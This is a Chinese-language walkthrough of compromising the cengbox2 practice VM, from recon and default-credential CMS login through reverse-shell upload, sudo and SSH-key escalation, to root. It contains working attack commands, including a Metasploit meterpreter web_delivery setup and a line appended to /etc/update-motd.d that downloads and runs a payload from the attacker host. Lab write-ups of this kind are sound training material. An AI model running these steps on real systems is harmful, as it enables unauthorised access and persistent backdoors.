cengbox2靶机
扫描不到靶机IP地址,教程
arp-scan -l 扫描靶机IP地址
nmap -sV -Pn -A x.x.x.138 扫描端口
访问80端口
扫描目录,并无可用
ftp匿名登录
依然没有有用的信息,不过既然靶机作者给出了提示,那么突破点就应该在网页上。
考虑到ceng-company.vm是一级域名,而绝大多数网站都是通过二级域名访问的,例如www.sogou.com、blog.csdn.net等。因此考虑在ceng-company.vm前加上前缀,组成二级域名,看网站是否有不同的响应。(忘记截图,盗用大佬的图)
扫描二级目录admin.ceng-company.vm发现有gila目录
存在admin.ceng-company.vm/gila/admin
由于note.txt中给出了提示,Kevin的账号是使用默认密码初始化的,尝试E-mail为kevin@ceng-company.vm,密码为admin登录。
登录成功后网页又跳转到初始页面,那么就试试admin页面。
查看页面内容后发现Content -> File Manager可以上传文件
看到有个tmp文件夹,发现这个文件夹能够成功上传反弹shell的脚本,但是这里有个.htacccess文件做了限制,直接把内容删除就行了,本地开启监听,访问页面,成功接收到反弹的shell
访问shell.php
获得shell
使用sudo -l显示出自己(执行 sudo 的使用者)的权限,发现可以无密码使用swartz身份执行/home/swartz/runphp.sh
使用php提权到swartz
sudo -u swartz /home/swartz/runphp.sh
system("/bin/bash");
在home目录下发现了另一个用户文件夹,并且有权限进行查看,发现了个.ssh文件夹,里面有个id_rsa文件,可以放到本地进行破解保存密码,然后使用该私钥进行登录
保存到本地
获得密码
登录
获得flag
find / -type f -perm -g+rwx 2>/dev/null
有写权限,直接就将反弹shell的一句话写入到其目录下的一个脚本文件中,使用msf生成文件
use exploit/multi/script/web_delivery
set target 6
set payload linux/x64/meterpreter/reverse_tcp
set lhost x.x.x.138
set lport 5555
run
echo "wget -qO WfRkW6wz --no-check-certificate http://x.x.x.138:8080/eml0ukKUyXRyfL; chmod +x WfRkW6wz; ./WfRkW6wz& disown" >> /etc/update-motd.d/00-header
退出重新ssh连接一下,成功产生session,查看家目录下的root.txt文件,拿到最后的flag
获得flag